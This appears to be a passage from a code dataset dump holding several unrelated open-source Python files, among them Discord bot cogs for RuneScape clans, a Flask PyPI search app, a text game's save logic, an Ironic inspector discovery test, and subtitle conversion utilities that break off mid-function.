metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "JohnVictor2017/StartTm",
"score": 2
} |
#### File: StartTm/perfis/views.py
```python
from django.shortcuts import render
from django.http import HttpResponse
from perfis.models import Perfil
from django.shortcuts import redirect
def index(request):
return render(request, 'index.html', { 'perfis' : Perfil.objects.all()})
#def exibir(request, perfil_id):
#
# perfil = Perfil.objects.get(id=perfil_id)
# return render(request, 'perfil.html', { "perfil" : perfil })
#def convidar(request, perfil_id):
#
# perfil_a_convidar = Perfil.objects.get(id=perfil_id)
# perfil_logado = get_perfil_logado(request)
# perfil_logado.convidar(perfil_a_convidar)
# return redirect('index');
def get_perfil_logado(request):
return Perfil.objects.get(id=1)
``` |
{
"source": "johnvictorfs/atlantisbot-rewrite",
"score": 2
} |
#### File: bot/cogs/clan.py
```python
import rs3clans
import discord
from discord.ext import commands
from bot.bot_client import Bot
from bot.utils.tools import separator
from bot.utils.context import Context
class Clan(commands.Cog):
def __init__(self, bot: Bot):
self.bot = bot
@commands.cooldown(1, 5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=['clan'])
async def clan_detail_info(self, ctx: Context, *, clan_name: str):
try:
clan = rs3clans.Clan(name=clan_name, set_exp=True)
except ConnectionError:
return await ctx.send(f"Houve um erro ao tentar conectar a API da Jagex. Tente novamente mais tarde.")
except rs3clans.ClanNotFoundError:
return await ctx.send(f"O clã '{clan_name}' não existe.")
clan_leader = None
for member in clan:
if member.rank == 'Owner':
clan_leader = member.name
clan_url = clan.name.replace(' ', '%20')
clan_embed = discord.Embed(
title=clan.name,
color=discord.Color.green(),
url=f'http://services.runescape.com/m=clan-home/clan/{clan_url}'
)
clan_embed.set_author(name='RuneClan', url=f'https://runeclan.com/clan/{clan_url}')
clan_embed.set_thumbnail(url=f'http://services.runescape.com/m=avatar-rs/{clan_url}/clanmotif.png')
clan_embed.add_field(name="Exp Total", value=f'{clan.exp:,}')
clan_embed.add_field(name="Membros", value=str(clan.count))
clan_embed.add_field(name="Líder", value=clan_leader)
clan_embed.add_field(name="Exp Média por Membro", value=f'{clan.avg_exp:,.0f}')
return await ctx.send(embed=clan_embed)
@commands.cooldown(1, 5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=['claninfo', 'clanexp', 'claexp', 'clainfo', 'clãexp', 'clãinfo'])
async def clan_user_info(self, ctx: Context, *, username: str):
try:
player = rs3clans.Player(name=username, runemetrics=True)
except ConnectionError:
return await ctx.send(f"Houve um erro ao tentar conectar a API da Jagex. Tente novamente mais tarde.")
if not player.exists:
return await ctx.send(f"Jogador '{player.name}' não existe.")
if not player.clan:
return await ctx.send(f"Jogador '{player.name}' não está em um clã.")
user_clan = rs3clans.Clan(name=player.clan)
member = user_clan.get_member(username)
user_clan_exp = member.exp
user_rank = member.rank
display_username = player.name
if self.bot.setting.show_titles:
if player.suffix:
display_username = f"{player.name} {player.title}"
else:
display_username = f"{player.title} {player.name}"
user_url_name = player.name.replace(" ", "%20")
user_url_clan = player.clan.replace(" ", "%20")
icon_url = f"https://secure.runescape.com/m=avatar-rs/{user_url_name}/chat.png"
runeclan_url = f"https://runeclan.com/user/{user_url_name}"
clan_banner_url = f"http://services.runescape.com/m=avatar-rs/l=3/a=869/{user_url_clan}/clanmotif.png"
embed_title = "RuneClan"
rank_header = "__Rank__"
clan_header = "__Clã__"
exp_header = "__Exp no Clã__"
total_exp_header = "__Exp Total__"
private_profile_header = "Indisponível - Perfil Privado"
rank_emoji = self.bot.setting.clan_settings[user_rank]['Emoji']
user_rank = self.bot.setting.clan_settings[user_rank]['Translation']
clan_info_embed = discord.Embed(
title=embed_title,
description="",
color=discord.Colour.dark_blue(),
url=runeclan_url,
)
clan_info_embed.set_author(
icon_url=icon_url, name=display_username
)
clan_info_embed.set_thumbnail(
url=clan_banner_url
)
clan_info_embed.add_field(
name=clan_header,
value=player.clan
)
clan_info_embed.add_field(
name=rank_header,
value=f"{user_rank} {rank_emoji}"
)
clan_info_embed.add_field(
name=exp_header,
value=f"{user_clan_exp:,}"
)
if player.private_profile:
clan_info_embed.add_field(
name=total_exp_header,
value=private_profile_header,
inline=False
)
else:
clan_info_embed.add_field(
name=total_exp_header,
value=f"{player.exp:,}"
)
return await ctx.send(content=None, embed=clan_info_embed)
@commands.cooldown(1, 5, commands.BucketType.user)
@commands.bot_has_permissions(embed_links=True)
@commands.command(aliases=['ranksupdate', 'upranks', 'rank'])
async def ranks(self, ctx: Context, *, clan: str = 'Atlantis'):
if clan.lower() == 'atlantis argus':
return await ctx.send('`!rank argus` irmão')
elif clan.lower() == 'atlantis':
exp_general = 2_000_000_000
exp_captain = 1_000_000_000
exp_lieutenant = 500_000_000
exp_seargent = 250_000_000
exp_corporal = 125_000_000
elif clan.lower() == 'argus':
exp_general = 500_000_000
exp_captain = 250_000_000
exp_lieutenant = 125_000_000
exp_seargent = 60_000_000
exp_corporal = 30_000_000
clan = 'Atlantis Argus'
else:
return await ctx.send('Clã não reconhecido.')
rank_emoji = {
'Recruit': self.bot.setting.clan_settings['Recruit']['Emoji'],
'Corporal': self.bot.setting.clan_settings['Corporal']['Emoji'],
'Sergeant': self.bot.setting.clan_settings['Sergeant']['Emoji'],
'Lieutenant': self.bot.setting.clan_settings['Lieutenant']['Emoji'],
'Captain': self.bot.setting.clan_settings['Captain']['Emoji'],
'General': self.bot.setting.clan_settings['General']['Emoji'],
}
ranks_embed = discord.Embed(
title="__Ranks a Atualizar__",
description=" ",
)
found = False
clan = rs3clans.Clan(clan, set_exp=False)
clan_members = reversed([member for member in clan])
member: rs3clans.ClanMember
for member in clan_members:
if len(ranks_embed.fields) >= 20:
await ctx.send('Muitos ranks a serem atualizados, enviando apenas os 20 primeiros.')
break
if member.exp >= exp_corporal and member.rank == 'Recruit':
ranks_embed.add_field(
name=member.name,
value=f"Recruta {rank_emoji['Recruit']} ❯ Cabo {rank_emoji['Corporal']}\n"
f"**__Exp:__** {member.exp:,}\n{separator}",
inline=False)
found = True
elif member.exp >= exp_general and member.rank == 'Captain':
ranks_embed.add_field(
name=member.name,
value=f"Capitão {rank_emoji['Captain']} ❯ General {rank_emoji['General']}\n"
f"**__Exp:__** {member.exp:,}\n{separator}",
inline=False)
found = True
elif member.exp >= exp_captain and member.rank == 'Lieutenant':
ranks_embed.add_field(
name=member.name,
value=f"Tenente {rank_emoji['Lieutenant']} ❯ Capitão {rank_emoji['Captain']}\n"
f"**__Exp:__** {member.exp:,}\n{separator}",
inline=False)
found = True
elif member.exp >= exp_lieutenant and member.rank == 'Sergeant':
ranks_embed.add_field(
name=member.name,
value=f"Sargento {rank_emoji['Sergeant']} ❯ Tenente {rank_emoji['Lieutenant']}\n"
f"**__Exp:__** {member.exp:,}\n{separator}",
inline=False)
found = True
elif member.exp >= exp_seargent and member.rank == 'Corporal':
ranks_embed.add_field(
name=member.name,
value=f"Cabo {rank_emoji['Corporal']} ❯ Sargento {rank_emoji['Sergeant']}\n"
f"**__Exp:__** {member.exp:,}\n{separator}",
inline=False)
found = True
if not found:
ranks_embed.add_field(
name="Nenhum Rank a ser atualizado no momento :)",
value=separator,
inline=False
)
return await ctx.send(embed=ranks_embed)
def setup(bot):
bot.add_cog(Clan(bot))
```
#### File: bot/cogs/error_handler.py
```python
import datetime
import logging
from concurrent.futures._base import TimeoutError
import sentry_sdk
import discord
from discord.ext import commands
from bot.bot_client import Bot
from bot.utils.context import Context
class CommandErrorHandler(commands.Cog):
def __init__(self, bot: Bot):
self.bot = bot
self.logger = logging.getLogger('commands')
self.logger.setLevel(logging.INFO)
handler = logging.FileHandler(filename='commands.log', encoding='utf-8')
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
if not self.logger.handlers:
# Prevent multiple handlers sending duplicate messages
self.logger.addHandler(handler)
async def bot_check(self, ctx: Context):
"""This runs at the start of every command"""
await ctx.trigger_typing()
time = datetime.datetime.utcnow().strftime('%d/%m/%y - %H:%M')
msg = f"'{ctx.command}' ran by '{ctx.author}' as '{ctx.invoked_with}' at {time}. with '{ctx.message.content}'"
self.logger.info(msg)
return True
@commands.Cog.listener()
async def on_command_error(self, ctx: Context, error: commands.CommandError):
if hasattr(ctx.command, 'on_error'):
# Don't try to handle the error if the command has a local handler
return
arguments_error = [
commands.MissingRequiredArgument,
commands.BadArgument,
commands.TooManyArguments,
]
if any([isinstance(error, arg_error) for arg_error in arguments_error]):
embed = discord.Embed(
title=f"Argumentos do comando '{ctx.command}':",
description="",
color=discord.Colour.red()
)
for param, param_type in ctx.command.clean_params.items():
try:
default_name = param_type.default.__name__
except AttributeError:
default_name = param_type.default
default = f"(Opcional, Padrão: {default_name})" if default_name != '_empty' else '(Obrigatório)'
p_type = param_type.annotation.__name__
if p_type == 'str':
p_type = 'Texto'
elif p_type == 'bool':
p_type = '[True, False]'
elif p_type == 'Member':
p_type = 'Membro'
elif p_type == 'int':
p_type = 'Número'
embed.add_field(name=param, value=f"**Tipo:** *{p_type}*\n*{default}*", inline=False)
try:
await ctx.send(embed=embed)
except discord.errors.Forbidden:
await ctx.send("Erro. Permissões insuficientes para enviar um Embed.")
elif isinstance(error, commands.CommandNotFound):
pass
elif isinstance(error, commands.DisabledCommand):
pass
# await ctx.send("Esse comando está desabilitado.")
elif isinstance(error, commands.NoPrivateMessage):
await ctx.send("Esse comando não pode ser usado em mensagens privadas.")
elif isinstance(error, commands.PrivateMessageOnly):
await ctx.send(
f"Esse comando só pode ser usado em Mensagens Privadas.\n"
f"Fale comigo aqui: {self.bot.user.mention}"
)
elif isinstance(error, commands.NotOwner):
await ctx.send("Você não pode usar isso.")
elif isinstance(error, commands.MissingPermissions):
permissions = [f"***{perm.title().replace('_', ' ')}***" for perm in error.missing_perms]
await ctx.send(f"Você precisa das seguintes permissões para fazer isso: {', '.join(permissions)}")
elif isinstance(error, commands.CommandOnCooldown):
await ctx.send(
f"Ei! Você já usou este comando recentemente. "
f"Espere mais {error.retry_after:.1f}s para usar novamente"
)
elif isinstance(error, commands.BotMissingPermissions):
permissions = [f"***{perm.title().replace('_', ' ')}***" for perm in error.missing_perms]
await ctx.send(f"Eu preciso das seguintes permissões para fazer isso: {', '.join(permissions)}")
elif isinstance(error, commands.errors.CheckFailure):
pass
elif isinstance(error, commands.errors.CommandInvokeError) and isinstance(error.original, TimeoutError):
await ctx.send('Ação cancelada. Tempo esgotado.')
else:
await ctx.send("Erro inesperado. Os logs desse erro foram enviados para um Dev e em breve será arrumado.")
sentry_sdk.set_user({
'id': ctx.author and ctx.author.id,
'username': str(ctx.author) if ctx.author else None,
})
sentry_sdk.set_context('discord', {
'guild': ctx.guild,
'channel': ctx.channel and (hasattr(ctx.channel, 'name') or None) and ctx.channel,
'message': ctx.message and ctx.message.content,
'message_id': ctx.message and ctx.message.id,
'cog': ctx.cog and ctx.cog.qualified_name,
'command': ctx.command and ctx.command.name
})
sentry_sdk.capture_exception(error)
def setup(bot):
bot.add_cog(CommandErrorHandler(bot))
```
#### File: bot/utils/teams.py
```python
from typing import Union, Tuple
import traceback
from django.db.models import Q
from atlantisbot_api.models import DiscordUser, Team, Player, BotMessage
import discord
from bot.utils.tools import has_any_role, separator
class TeamNotFoundError(Exception):
pass
class WrongChannelError(Exception):
pass
def secondary_full(team: Team) -> Tuple[int, bool]:
"""Checks if a team has hit its limit for number of players that only have its secondary role requirement"""
secondary_count = team.players.filter(secondary=True).count()
if not team.secondary_limit:
# If the team does not have a secondary role limit, then it can't ever reach that
return 0, False
return secondary_count, (secondary_count >= team.secondary_limit)
def add_to_team(author: discord.Member, team: Team, substitute: bool, secondary: bool) -> None:
"""Adds a Player to a Team"""
added_player = Player(player_id=str(author.id), team=team, substitute=substitute, secondary=secondary)
added_player.save()
def first_substitute(team: Team, exclude: int) -> Union[Player, None]:
return team.players.filter(~Q(player_id=str(exclude)), substitute=True).first()
def remove_from_team(player_id: int, team: Team) -> None:
team.players.filter(player_id=str(player_id)).delete()
def team_count(team: Team) -> int:
return team.players.count()
async def update_team_message(message: discord.Message, team: Team, prefix: str) -> None:
embed_description = f"Marque presença no <#{team.invite_channel_id}>\n Criador: <@{team.author_id}>"
requisito = ""
requisito2 = ""
if team.role:
requisito = f"Requisito: <@&{team.role}>\n"
if team.role_secondary:
count = team.players.filter(secondary=True).count()
limit = "" if not team.secondary_limit else f"({count}/{team.secondary_limit})"
requisito2 = f"Requisito Secundário: <@&{team.role_secondary}> {limit}\n\n"
embed_description = f"{requisito}{requisito2}{embed_description}"
team_embed = discord.Embed(
title=f"__{team.title}__ - {team_count(team)}/{team.size}",
description=embed_description,
color=discord.Color.purple()
)
footer = f"Digite '{prefix}del {team.team_id}' para excluir o time. (Criador do time ou Admin e acima)"
team_embed.set_footer(text=footer)
index = 0
for player in team.players.all():
if not player.substitute:
user = DiscordUser.objects.filter(discord_id=player.player_id).first()
player_role = f"({player.role})" if player.role else ""
if user:
player_ingame = f"({user.ingame_name})"
else:
player_ingame = ""
player_value = (
f"{index + 1}- <@{player.player_id}> {player_role} {player_ingame}"
f"{'***(Secundário)***' if player.secondary else ''}"
)
team_embed.add_field(name=separator, value=player_value, inline=False)
index += 1
for player in team.players.all():
if player.substitute:
user_ = DiscordUser.objects.filter(discord_id=player.player_id).first()
if user_:
player_ingame = f"({user_.ingame_name})"
else:
player_ingame = ""
player_role = f"({player.role})" if player.role else ""
player_value = (f"- <@{player.player_id}> {player_role} {player_ingame} ***(Substituto)*** "
f"{'***(Secundário)***' if player.secondary else ''}")
team_embed.add_field(name=separator, value=player_value, inline=False)
await message.edit(embed=team_embed)
async def manage_team(team_id: str, client, message: discord.Message, mode: str) -> None:
"""
Manages a join or leave for a Team
mode: can be 'join' or 'leave'
"""
try:
team = Team.objects.filter(team_id=team_id).first()
if not team:
raise TeamNotFoundError
if int(team.invite_channel_id or 0) != message.channel.id:
raise WrongChannelError
await message.delete()
current_players = team.players
substitutes = team.players.filter(substitute=True)
invite_channel: discord.TextChannel = client.get_channel(int(team.invite_channel_id or 0))
team_channel: discord.TextChannel = client.get_channel(int(team.team_channel_id or 0))
if not invite_channel or not team_channel:
return await delete_team(team, client)
try:
team_message = await team_channel.fetch_message(int(team.team_message_id or 0))
except discord.errors.NotFound:
return await delete_team(team, client)
text = ''
no_perm_embed = None
if mode == 'join':
team_role = None if not team.role else int(team.role)
secondary_team_role = None if not team.role_secondary else int(team.role_secondary)
has_main = has_any_role(message.author, team_role) # Has main role requirement
has_secondary = has_any_role(message.author, secondary_team_role) # Has secondary role requirement
has_any = has_any_role(message.author, team_role, secondary_team_role) # Has either or both
# Has only secondary requirement
is_secondary = True if (has_secondary and not has_main) else False
if is_secondary:
_, is_team_full = secondary_full(team)
else:
is_team_full = is_full(team)
if in_team(message.author.id, team):
text = 'já está no time'
elif has_any or not team_role:
add_to_team(message.author, team, substitute=is_team_full, secondary=is_secondary)
text = 'entrou ***como substituto*** no time' if is_team_full else 'entrou no time'
else:
description = f"{message.author.mention}, você precisa ter o cargo <@&{team.role}>"
if team.role_secondary:
description = f"{description} ou o cargo <@&{team.role_secondary}>"
description = (f"{description} para entrar no Time '{team.title}' "
f"({current_players.count() - substitutes.count()}/{team.size})\n"
f"(*`{message.content}`*)")
no_perm_embed = discord.Embed(
title=f"__Permissões insuficientes__",
description=description,
color=discord.Color.dark_red()
)
elif mode == 'leave':
if in_team(message.author.id, team):
text = 'saiu do time'
substitute: Player = first_substitute(team, message.author.id)
is_substitute = team.players.filter(player_id=str(message.author.id)).first().substitute
# If the person leaving is not a substitute and there is one available, then
# make that substitute not be a substitute anymore
if substitute and not is_substitute:
if substitute.secondary and secondary_full(team)[1]:
pass
else:
substitute.substitute = False
substitute.save()
_text = (f"<@{substitute.player_id}> não é mais um substituto do time "
f"**[{team.title}]({team_message.jump_url})** "
f"({current_players.count() - substitutes.count() - 1}/{team.size})")
embed = discord.Embed(title='', description=_text, color=discord.Color.green())
msg = await invite_channel.send(content=f"<@{substitute.player_id}>", embed=embed)
bot_message = BotMessage(message_id=msg.id, team=team)
bot_message.save()
remove_from_team(message.author.id, team)
else:
text = 'já não estava no time'
if no_perm_embed:
sent_message = await invite_channel.send(embed=no_perm_embed)
else:
_text = (f"{message.author.mention} {text} **[{team.title}]({team_message.jump_url})** "
f"({current_players.count() - substitutes.count()}/{team.size})\n\n *`{message.content}`*")
if mode == 'leave':
embed_color = discord.Color.red()
else:
embed_color = discord.Color.green()
embed = discord.Embed(title='', description=_text, color=embed_color)
embed.set_author(name=message.author.display_name, icon_url=message.author.avatar_url)
sent_message = await invite_channel.send(embed=embed)
bot_message = BotMessage(message_id=sent_message.id, team=team)
bot_message.save()
try:
await update_team_message(team_message, team, client.setting.prefix)
except discord.errors.NotFound:
team.delete()
except TeamNotFoundError:
raise TeamNotFoundError
except WrongChannelError:
raise WrongChannelError
except Exception as e:
await client.send_logs(e, traceback.format_exc())
def is_full(team: Team) -> bool:
"""Verifies if a team is full or not"""
count = team.players.filter(substitute=False).count()
return count >= team.size
def in_team(author_id: int, team: Team) -> bool:
"""Checks if a player is in a team"""
return author_id in [int(player.player_id) for player in team.players.all()]
async def delete_team(team: Team, client) -> None:
try:
team_channel = client.get_channel(int(team.team_channel_id or 0))
invite_channel = client.get_channel(int(team.invite_channel_id or 0))
except Exception:
team.delete()
return
try:
team_message = await team_channel.fetch_message(int(team.team_message_id or 0))
await team_message.delete()
except Exception:
pass
try:
invite_message = await invite_channel.fetch_message(int(team.invite_message_id or 0))
await invite_message.delete()
except Exception:
pass
try:
messages_to_delete = []
for message in BotMessage.objects.filter(team=team):
to_delete = await invite_channel.fetch_message(message.message_id)
messages_to_delete.append(to_delete)
await invite_channel.delete_messages(messages_to_delete)
except Exception:
pass
team.delete()
``` |
{
"source": "johnvictorfs/cytheron",
"score": 3
} |
#### File: cytheron/cytheron/logger.py
```python
from colorama import Fore
import logging
class CustomFormatter(logging.Formatter):
"""
https://stackoverflow.com/a/56944256/10416161
Logging Formatter to add colors and count warning / errors
"""
log_format = "%(levelname)s - %(message)s (%(filename)s:%(lineno)d)"
FORMATS = {
logging.DEBUG: Fore.LIGHTWHITE_EX + log_format + Fore.RESET,
logging.INFO: Fore.LIGHTWHITE_EX + log_format + Fore.RESET,
logging.WARNING: Fore.YELLOW + log_format + Fore.RESET,
logging.ERROR: Fore.RED + log_format + Fore.RESET,
logging.CRITICAL: Fore.RED + log_format + Fore.RESET
}
def format(self, record: logging.LogRecord):
log_fmt = self.FORMATS.get(record.levelno)
formatter = logging.Formatter(log_fmt)
return formatter.format(record)
``` |
{
"source": "johnvictorfs/discord_bot_template",
"score": 2
} |
#### File: discord_bot_template/tests/conftest.py
```python
import glob
import os
import discord.ext.test as dpytest
import pytest
from rich import print
from bot.bot_client import Bot
from bot.settings import Settings
@pytest.fixture
def bot(request, event_loop):
"""
https://dpytest.readthedocs.io/en/latest/tutorials/using_pytest.html#starting-with-pytest
"""
settings: Settings = {'token': 'abc', 'prefix': '!'}
bot = Bot(settings=settings, loop=event_loop)
print()
for extension in bot.get_cogs():
try:
bot.load_extension(f'bot.cogs.{extension}')
bot.print_success(f'Loaded extension [cyan]{extension}[/cyan]')
except Exception as e:
error = f'{extension}:\n {type(e).__name__} : {e}'
bot.print_error(f'Failed to load extension [cyan]{extension}[/cyan].\n[red]{error}[/red]')
print('[green bold]Finished loading all extensions.[/green bold]')
dpytest.configure(bot)
return bot
def pytest_sessionfinish():
# Clean up attachment files
files = glob.glob('./dpytest_*.dat')
for path in files:
try:
os.remove(path)
except Exception as e:
print(f'Error while deleting file {path}: {e}')
@pytest.fixture(autouse=True)
async def cleanup():
yield
await dpytest.empty_queue()
``` |
{
"source": "johnvictorfs/pypip-info",
"score": 2
} |
#### File: johnvictorfs/pypip-info/main.py
```python
from flask import Flask, jsonify, render_template, send_from_directory
from flaskwebgui import FlaskUI
from flask_cors import CORS
from pip_gui.pypi import search_pypi, get_package
DEBUG = False
app = Flask(__name__, static_url_path='/static')
app.config.from_object(__name__)
CORS(app, resources={r"/api/*": {"origins": "*"}})
ui = FlaskUI(app)
# Serve static files
@app.route('/js/<path:path>')
def send_js(path):
return send_from_directory('templates/js', path)
@app.route('/css/<path:path>')
def send_css(path):
return send_from_directory('templates/css', path)
@app.route("/api/search/<string:query>")
def index(query):
"""
Search PyPi API
"""
return jsonify(search_pypi(query))
@app.route("/api/package/<string:package_name>")
def package(package_name):
return jsonify(get_package(package_name))
@app.route("/")
def homepage():
return render_template("index.html")
if __name__ == '__main__':
ui.run()
``` |
{
"source": "johnvictorfs/sacred-river-2",
"score": 3
} |
#### File: sacred-river-2/sacred-river/usersave.py
```python
from player import Player
import configparser
import inventory
from prompt import prompt
STATUS_FILE = 'user_stats.ini'
INVENTORY_FILE = 'inventory.ini'
def settings_exist(file=STATUS_FILE):
"""
Verifies if 'settings.ini' file exists or not.
:return: bool
"""
try:
with open(file, 'r'):
return True
except FileNotFoundError:
return False
def read_save_status(file=STATUS_FILE):
status_file = configparser.ConfigParser()
status_file.read(file)
user_name = status_file['USER_STATS']['name']
user_attack = status_file['USER_STATS']['attack']
user_defence = status_file['USER_STATS']['defence']
user_health = status_file['USER_STATS']['health']
user_gold = status_file['USER_STATS']['gold']
user_luck = status_file['USER_STATS']['luck']
player_save = Player(user_name, user_attack, user_defence, user_health, user_gold, user_luck)
return player_save
def read_inventory_status(file=INVENTORY_FILE):
inventory_file = configparser.ConfigParser()
inventory_file.read(file)
try:
for key in inventory_file['USER_INVENTORY']:
for item in inventory.item_list:
if str(key) == str(item.id):
for quantity in range(int(inventory_file['USER_INVENTORY'][key])):
inventory.inv.add_item(item, message=False)
for key in inventory_file['USER_EQUIPMENT']:
for item in inventory.item_list:
if str(key) == str(item.id):
inventory.inv.add_item(item, message=False)
inventory.inv.equip_item(item, message=False)
except KeyError:
return
def create_save(name):
config = configparser.ConfigParser()
config['USER_STATS'] = {
'name': name,
'attack': 10,
'defence': 0,
'health': 50,
'gold': 20,
'luck': 1
}
if settings_exist(file=STATUS_FILE):
player_save = read_save_status()
return player_save
else:
with open(STATUS_FILE, 'w') as config_file:
config.write(config_file)
return
def create_user_data():
if settings_exist():
user = read_save_status(file=STATUS_FILE)
read_inventory_status()
if user.health <= 0:
create_save(user.name)
user = read_save_status(file=STATUS_FILE)
return user
return user
else:
user_name = prompt("\n< How are you called? >\n\n>> ")
create_save(user_name)
user = read_save_status(file=STATUS_FILE)
return user
def save_stats():
config = configparser.ConfigParser()
config['USER_STATS'] = {
'name': player.name,
'attack': player.attack,
'defence': player.defence,
'health': player.health,
'gold': player.gold,
'luck': player.luck
}
with open(STATUS_FILE, 'w') as config_file:
config.write(config_file)
def save_inventory():
config = configparser.ConfigParser()
config['USER_INVENTORY'] = {}
config['USER_EQUIPMENT'] = {}
for item in inventory.inv.items.values():
config['USER_INVENTORY'][str(item.id)] = str(item.quantity)
for item in inventory.inv.equipment.values():
config['USER_EQUIPMENT'][str(item.id)] = str(item.item_type)
with open('inventory.ini', 'w') as config_file:
config.write(config_file)
def save_game():
print("[[[ Saving game... ]]]")
save_stats()
save_inventory()
print("[ Game Saved ]")
prompt()
player = create_user_data()
``` |
{
"source": "JohnVillalovos/controller",
"score": 2
} |
#### File: controller/tests/conftest.py
```python
import pytest
from starlette.testclient import TestClient
@pytest.fixture(scope="function")
def client():
from controller.main import app
client = TestClient(app)
return client
``` |
{
"source": "JohnVillalovos/ironic-tempest-plugin-inspector",
"score": 2
} |
#### File: ironic_tempest_plugin/tests/test_discovery.py
```python
import six
from ironic_tempest_plugin.tests.scenario import baremetal_manager
from tempest import config
from tempest.lib import decorators
from tempest import test # noqa
from ironic_inspector.test.inspector_tempest_plugin.tests import manager
CONF = config.CONF
ProvisionStates = baremetal_manager.BaremetalProvisionStates
class InspectorDiscoveryTest(manager.InspectorScenarioTest):
@classmethod
def skip_checks(cls):
super(InspectorDiscoveryTest, cls).skip_checks()
if not CONF.baremetal_introspection.auto_discovery_feature:
msg = ("Please, provide a value for node_not_found_hook in "
"processing section of inspector.conf for enable "
"auto-discovery feature.")
raise cls.skipException(msg)
def setUp(self):
super(InspectorDiscoveryTest, self).setUp()
discovered_node = self._get_discovery_node()
self.node_info = self._get_node_info(discovered_node)
rule = self._generate_discovery_rule(self.node_info)
self.rule_import_from_dict(rule)
self.addCleanup(self.rule_purge)
def _get_node_info(self, node_uuid):
node = self.node_show(node_uuid)
ports = self.node_port_list(node_uuid)
node['port_macs'] = [port['address'] for port in ports]
return node
def _get_discovery_node(self):
nodes = self.node_list()
discovered_node = None
for node in nodes:
if (node['provision_state'] == ProvisionStates.AVAILABLE or
node['provision_state'] == ProvisionStates.ENROLL or
node['provision_state'] is ProvisionStates.NOSTATE):
discovered_node = node['uuid']
break
self.assertIsNotNone(discovered_node)
return discovered_node
def _generate_discovery_rule(self, node):
rule = dict()
rule["description"] = "Node %s discovery rule" % node['name']
rule["actions"] = [
{"action": "set-attribute", "path": "/name",
"value": "%s" % node['name']},
{"action": "set-attribute", "path": "/driver",
"value": "%s" % node['driver']},
]
for key, value in node['driver_info'].items():
rule["actions"].append(
{"action": "set-attribute", "path": "/driver_info/%s" % key,
"value": "%s" % value})
rule["conditions"] = [
{"op": "eq", "field": "data://auto_discovered", "value": True}
]
return rule
def verify_node_introspection_data(self, node):
data = self.introspection_data(node['uuid'])
self.assertEqual(data['cpu_arch'],
self.flavor['properties']['cpu_arch'])
self.assertEqual(int(data['memory_mb']),
int(self.flavor['ram']))
self.assertEqual(int(data['cpus']), int(self.flavor['vcpus']))
def verify_node_flavor(self, node):
expected_cpus = self.flavor['vcpus']
expected_memory_mb = self.flavor['ram']
expected_cpu_arch = self.flavor['properties']['cpu_arch']
disk_size = self.flavor['disk']
ephemeral_size = self.flavor['OS-FLV-EXT-DATA:ephemeral']
expected_local_gb = disk_size + ephemeral_size
self.assertEqual(expected_cpus,
int(node['properties']['cpus']))
self.assertEqual(expected_memory_mb,
int(node['properties']['memory_mb']))
self.assertEqual(expected_local_gb,
int(node['properties']['local_gb']))
self.assertEqual(expected_cpu_arch,
node['properties']['cpu_arch'])
def verify_node_driver_info(self, node_info, inspected_node):
for key in node_info['driver_info']:
self.assertEqual(six.text_type(node_info['driver_info'][key]),
inspected_node['driver_info'].get(key))
@decorators.idempotent_id('dd3abe5e-0d23-488d-bb4e-344cdeff7dcb')
def test_bearmetal_auto_discovery(self):
"""This test case follows this set of operations:
* Choose appropriate node, based on provision state;
* Get node info;
* Generate discovery rule;
* Delete discovered node from ironic;
* Start baremetal vm via virsh;
* Wating for node introspection;
* Verify introspected node.
"""
# NOTE(aarefiev): workaround for infra, 'tempest' user doesn't
# have virsh privileges, so lets power on the node via ironic
# and then delete it. Because of node is blacklisted in inspector
# we can't just power on it, therefor start introspection is used
# to whitelist discovered node first.
self.baremetal_client.set_node_provision_state(
self.node_info['uuid'], 'manage')
self.introspection_start(self.node_info['uuid'])
self.wait_power_state(
self.node_info['uuid'],
baremetal_manager.BaremetalPowerStates.POWER_ON)
self.node_delete(self.node_info['uuid'])
self.wait_for_node(self.node_info['name'])
inspected_node = self.node_show(self.node_info['name'])
self.verify_node_flavor(inspected_node)
if CONF.service_available.swift:
self.verify_node_introspection_data(inspected_node)
self.verify_node_driver_info(self.node_info, inspected_node)
self.assertEqual(ProvisionStates.ENROLL,
inspected_node['provision_state'])
``` |
{
"source": "JohnVillalovos/subaligner",
"score": 3
} |
#### File: subaligner/subaligner/utils.py
```python
import os
import subprocess
import pysubs2
import requests
import shutil
import cchardet
from pycaption import (
CaptionConverter,
SRTWriter,
SRTReader,
DFXPWriter,
DFXPReader,
SAMIWriter,
SAMIReader,
)
from typing import Optional, TextIO, BinaryIO, Union, Callable, Any, Tuple
from .exception import TerminalException
from subaligner.lib.to_srt import STL, SRT
class Utils(object):
"""Utility functions
"""
FFMPEG_BIN = os.getenv("FFMPEG_PATH") or os.getenv("ffmpeg_path") or "ffmpeg"
@staticmethod
def srt2ttml(srt_file_path: str, ttml_file_path: Optional[str] = None) -> None:
"""Convert SubRip subtitles to TTML subtitles.
Arguments:
srt_file_path {string} -- The path to the SubRip file.
ttml_file_path {string} -- The path to the TTML file.
"""
file: Union[TextIO, BinaryIO]
converter = CaptionConverter()
encoding = Utils.detect_encoding(srt_file_path)
with open(srt_file_path, "r", encoding=encoding) as file:
converter.read(file.read(), SRTReader())
if ttml_file_path is None:
ttml_file_path = srt_file_path.replace(".srt", ".xml")
with open(ttml_file_path, "wb") as file:
file.write(converter.write(DFXPWriter()).encode(encoding))
@staticmethod
def ttml2srt(ttml_file_path: str, srt_file_path: Optional[str] = None) -> None:
"""Convert TTML subtitles to SubRip subtitles.
Arguments:
ttml_file_path {string} -- The path to the TTML file.
srt_file_path {string} -- The path to the SubRip file.
"""
file: Union[TextIO, BinaryIO]
converter = CaptionConverter()
encoding = Utils.detect_encoding(ttml_file_path)
with open(ttml_file_path, "r", encoding=encoding) as file:
converter.read(file.read(), DFXPReader())
if srt_file_path is None:
srt_file_path = ttml_file_path.replace(".xml", ".srt")
with open(srt_file_path, "wb") as file:
file.write(converter.write(SRTWriter()).encode(encoding))
@staticmethod
def srt2vtt(srt_file_path: str, vtt_file_path: Optional[str] = None, timeout_secs: int = 30) -> None:
"""Convert SubRip subtitles to WebVTT subtitles.
Arguments:
srt_file_path {string} -- The path to the SubRip file.
vtt_file_path {string} -- The path to the WebVTT file.
timeout_secs {int} -- The timeout in seconds on conversion {default: 30}.
"""
_vtt_file_path = srt_file_path.replace(".srt", ".vtt") if vtt_file_path is None else vtt_file_path
encoding = Utils.detect_encoding(srt_file_path)
